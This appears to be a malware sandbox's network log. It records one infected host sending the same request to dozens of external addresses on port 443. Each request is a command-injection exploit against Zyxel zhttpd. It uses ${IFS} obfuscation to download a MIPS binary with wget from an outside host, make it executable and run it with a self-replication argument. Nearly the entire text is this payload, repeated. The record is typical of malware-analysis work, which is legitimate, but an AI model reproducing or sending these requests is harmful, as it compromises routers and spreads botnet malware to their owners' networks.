                                                        Feb 2, 2024 06:21:16.045187950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5960192.168.2.145835288.151.6.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045228958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5961192.168.2.1451560143.52.231.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045257092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5962192.168.2.1444584139.195.58.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045283079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5963192.168.2.146012675.225.91.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045327902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5964192.168.2.1443754172.105.237.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045372009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5965192.168.2.1442062132.35.167.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045419931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5966192.168.2.1449600157.153.114.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045464039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5967192.168.2.1459600106.26.196.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045483112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5968192.168.2.144710634.219.214.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045512915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5969192.168.2.144447848.98.245.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045557976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5970192.168.2.1447706194.149.235.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045594931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5971192.168.2.1437276108.97.137.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045617104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5972192.168.2.1452012131.193.64.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045661926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5973192.168.2.1459426124.10.223.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045701027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5974192.168.2.143781091.11.106.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045733929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5975192.168.2.145475065.162.68.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045789957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5976192.168.2.1440198135.244.199.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045835018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5977192.168.2.1460336201.157.153.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045881033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5978192.168.2.1432834141.139.60.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045928955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5979192.168.2.14549025.40.33.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.045974016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5980192.168.2.145485254.202.213.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046000957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5981192.168.2.145181472.244.177.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046058893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5982192.168.2.144553038.98.242.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046106100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5983192.168.2.1436702195.96.164.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046154976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5984192.168.2.144763289.41.238.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046188116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5985192.168.2.1459218152.67.175.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046216965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5986192.168.2.1452924147.94.50.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046267986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5987192.168.2.1453688216.64.142.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046303034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5988192.168.2.1435416130.237.95.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046338081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5989192.168.2.144419643.224.39.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046396017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5990192.168.2.1450938103.65.75.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046432972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5991192.168.2.1444110207.4.170.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046473980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5992192.168.2.1452794113.210.167.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046521902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5993192.168.2.143594231.151.227.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046550989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5994192.168.2.1437536177.109.217.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046624899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5995192.168.2.14395082.225.209.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046674013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5996192.168.2.1459516170.13.240.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046704054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5997192.168.2.145043818.105.6.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046746969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5998192.168.2.145274297.228.145.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046799898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5999192.168.2.1443856101.53.30.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046837091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6000192.168.2.145095674.97.47.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046905041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6001192.168.2.145600618.81.27.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046932936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6002192.168.2.1445330194.98.248.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.046991110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6003192.168.2.14509842.24.25.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047025919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6004192.168.2.14426029.23.241.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047075987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6005192.168.2.1455680195.2.40.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047121048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6006192.168.2.145133014.87.122.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047171116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6007192.168.2.1459268106.141.28.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047211885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6008192.168.2.1443570140.113.149.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047239065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6009192.168.2.144121675.230.157.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047282934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6010192.168.2.1443414171.56.8.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047327042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6011192.168.2.1441362222.203.215.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047364950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6012192.168.2.145865871.2.171.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047430038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6013192.168.2.1433622164.245.217.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047473907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6014192.168.2.1458164121.88.176.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047524929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6015192.168.2.144088018.2.89.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047544003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6016192.168.2.1443436118.214.179.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047591925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6017192.168.2.1450794135.224.204.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047621965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6018192.168.2.144086068.27.50.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047671080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6019192.168.2.1456282159.70.39.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047704935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6020192.168.2.1451806120.94.162.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047763109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6021192.168.2.144493679.28.229.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.047806978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6022192.168.2.14358221.89.87.135443
                                                        TimestampBytes transferredDirectionData
